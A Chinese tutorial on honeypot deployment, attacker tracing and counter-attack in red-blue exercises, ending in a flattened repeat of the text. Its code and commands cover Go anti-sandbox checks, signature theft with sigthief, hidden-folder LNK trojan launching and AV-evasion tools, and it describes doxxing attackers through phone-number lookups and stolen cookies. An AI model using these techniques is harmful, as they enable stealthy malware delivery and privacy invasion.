【溯源反制】自搭建蜜罐到反制攻击队
字数 1184 2025-08-06 08:35:00

蜜罐搭建与溯源反制技术详解

前言

溯源反制是红蓝对抗中的关键环节,通过精心设计的蜜罐系统可以有效地捕获攻击者信息并实现反制。本文将从蜜罐部署、溯源方法和反制技术三个维度进行全面讲解。

蜜罐部署策略

环境搭建要点

  1. 高仿真虚拟环境

    • 避免使用厂商云蜜罐(特征明显易被识别)
    • 推荐使用真实漏洞环境(如致远OA等常见系统)
    • 保留nday漏洞方便攻击者利用
  2. 部署注意事项

    • 必须提前向裁判/上级报备
    • 蜜罐需单独隔离防止横向扩散
    • 域名命名使用常见字典词(demo、crm等)
    • 可通过WAF重定向加速测绘平台收录
  3. 云服务器准备

    • 镜像导入需安装特定驱动(如腾讯云文档所述)
    • 确保系统运行流畅不卡顿

诱饵设计技巧

  1. 文件诱饵选择

    • 内部密码本
    • VPN客户端程序
    • 公司通讯录
    • 敏感文档
  2. 增加可信度方法

    • 配套使用说明文档
    • 合理的文件命名和存放路径
    • 设置上线提醒机制(参考相关技术文章)

溯源技术详解

常规溯源流程

  1. IP信息收集

    • 从防火墙/态势感知获取攻击IP
    • 使用EHole等工具进行指纹识别
    • 检查是否绑定域名(国内域名需备案)
  2. WHOIS查询

    • 获取注册人姓名和联系方式
    • 交叉验证其他平台信息
  3. 资产关联分析

    • 检查IP是否运行扫描器/攻击平台
    • 查找关联的技术博客/GitHub等

实战溯源案例

  1. 浏览器历史记录分析

    • 查找用户名/手机号等个人信息
    • 通过手机号反查身份信息
    • 关联学校/公司信息确认身份
  2. 配置文件提取

    • 获取各类系统的cookie/token
    • 利用这些凭证登录攻击者账户
    • 获取百度ID等技术账号
  3. 考试/认证信息

    • 查找CISP-PTE等认证文件
    • 确认攻击者技术背景
  4. 反钓鱼技巧

    • 使用热点+虚拟机模拟真实环境
    • 放置精心设计的反制文件
    • 配合攻击者表演获取信任

反制技术实现

木马免杀技术

  1. 推荐项目

    • GobypassAV-shellcode(过国内主流杀软)
    • SysHttpHookSleep(优质免杀方案)
  2. 反沙箱技术

    // 检测桌面文件数量
    func desktop() {
      desktopPath, err := os.UserHomeDir()
      if err != nil {
        return
      }
    
      desktopFiles, err := ioutil.ReadDir(filepath.Join(desktopPath, "Desktop"))
      if err != nil {
        return
      }
    
      fileCount := len(desktopFiles)
      if fileCount < 10 {
        os.Exit(0)
      }
    }
    
    // 检测进程名一致性
    func process() {
      executablePath, err := os.Executable()
      if err != nil {
        return
      }
    
      sourceFilename := filepath.Base(executablePath)
      processName := filepath.Base(os.Args[0])
    
      if !strings.EqualFold(sourceFilename, processName) {
        os.Exit(0)
      }
    }
    

资源伪装技术

  1. 图标替换工具

    • BeCyIconGrabberPortable(图标提取)
    • Resource Hacker(图标替换)
    • 360QVM_bypass(批量生成免杀马)
  2. 签名伪造

    python sigthief.py -i 360Safe.exe -t notepad.exe -o tes.exe
    
    • 使用可信文件的签名
    • 通过TrustAsia等平台获取合法签名

木马捆绑技术

  1. 推荐工具

    • Bundler-bypass
    • GoFileBinder
  2. 使用注意

    • 保持exe文件在命令中的顺序
    • 使用Go 1.17版本(1.18可能失败)
    • 同时释放正常文件降低怀疑

LNK文件制作

  1. 文件结构设计

    [可见层]
    ├── 快捷方式.lnk
    └── [隐藏文件夹]_MACOS_
            └── [隐藏子文件夹]__MACOS__
                    └── [隐藏子文件夹]__MACOS__
                            └── [隐藏子文件夹]__MACOS1__
                                    └── 真实木马.exe
    
  2. 隐藏属性设置

    attrib +s +h +r C:\Users\Public\xxx.exe
    
  3. 快捷方式配置

    %windir%\system32\cmd.exe /c start .\\.\_\_MACOS\_\_\\.\_\_MACOS\_\_\\.\_\_MACOS\_\_\\.\_\_MACOS1\_\_\\xxx.doc && C:\Windows\explorer.exe ".\\.\_\_MACOS\_\_\\.\_\_MACOS\_\_\\.\_\_MACOS\_\_\\.\_\_MACOS1\_\_\\xxx.exe"
    

总结

蜜罐反制是系统工程,需要:

  1. 精心设计高仿真环境
  2. 准备多种反制技术方案
  3. 耐心等待攻击者上钩
  4. 快速准确的溯源分析能力

通过本文介绍的技术组合,蓝队可以在防守中实现有效反制,为防守方争取主动权。

蜜罐搭建与溯源反制技术详解 前言 溯源反制是红蓝对抗中的关键环节,通过精心设计的蜜罐系统可以有效地捕获攻击者信息并实现反制。本文将从蜜罐部署、溯源方法和反制技术三个维度进行全面讲解。 蜜罐部署策略 环境搭建要点 高仿真虚拟环境 : 避免使用厂商云蜜罐(特征明显易被识别) 推荐使用真实漏洞环境(如致远OA等常见系统) 保留nday漏洞方便攻击者利用 部署注意事项 : 必须提前向裁判/上级报备 蜜罐需单独隔离防止横向扩散 域名命名使用常见字典词(demo、crm等) 可通过WAF重定向加速测绘平台收录 云服务器准备 : 镜像导入需安装特定驱动(如腾讯云文档所述) 确保系统运行流畅不卡顿 诱饵设计技巧 文件诱饵选择 : 内部密码本 VPN客户端程序 公司通讯录 敏感文档 增加可信度方法 : 配套使用说明文档 合理的文件命名和存放路径 设置上线提醒机制(参考相关技术文章) 溯源技术详解 常规溯源流程 IP信息收集 : 从防火墙/态势感知获取攻击IP 使用EHole等工具进行指纹识别 检查是否绑定域名(国内域名需备案) WHOIS查询 : 获取注册人姓名和联系方式 交叉验证其他平台信息 资产关联分析 : 检查IP是否运行扫描器/攻击平台 查找关联的技术博客/GitHub等 实战溯源案例 浏览器历史记录分析 : 查找用户名/手机号等个人信息 通过手机号反查身份信息 关联学校/公司信息确认身份 配置文件提取 : 获取各类系统的cookie/token 利用这些凭证登录攻击者账户 获取百度ID等技术账号 考试/认证信息 : 查找CISP-PTE等认证文件 确认攻击者技术背景 反钓鱼技巧 : 使用热点+虚拟机模拟真实环境 放置精心设计的反制文件 配合攻击者表演获取信任 反制技术实现 木马免杀技术 推荐项目 : GobypassAV-shellcode(过国内主流杀软) SysHttpHookSleep(优质免杀方案) 反沙箱技术 : 资源伪装技术 图标替换工具 : BeCyIconGrabberPortable(图标提取) Resource Hacker(图标替换) 360QVM_ bypass(批量生成免杀马) 签名伪造 : 使用可信文件的签名 通过TrustAsia等平台获取合法签名 木马捆绑技术 推荐工具 : Bundler-bypass GoFileBinder 使用注意 : 保持exe文件在命令中的顺序 使用Go 1.17版本(1.18可能失败) 同时释放正常文件降低怀疑 LNK文件制作 文件结构设计 : 隐藏属性设置 : 快捷方式配置 : 总结 蜜罐反制是系统工程,需要: 精心设计高仿真环境 准备多种反制技术方案 耐心等待攻击者上钩 快速准确的溯源分析能力 通过本文介绍的技术组合,蓝队可以在防守中实现有效反制,为防守方争取主动权。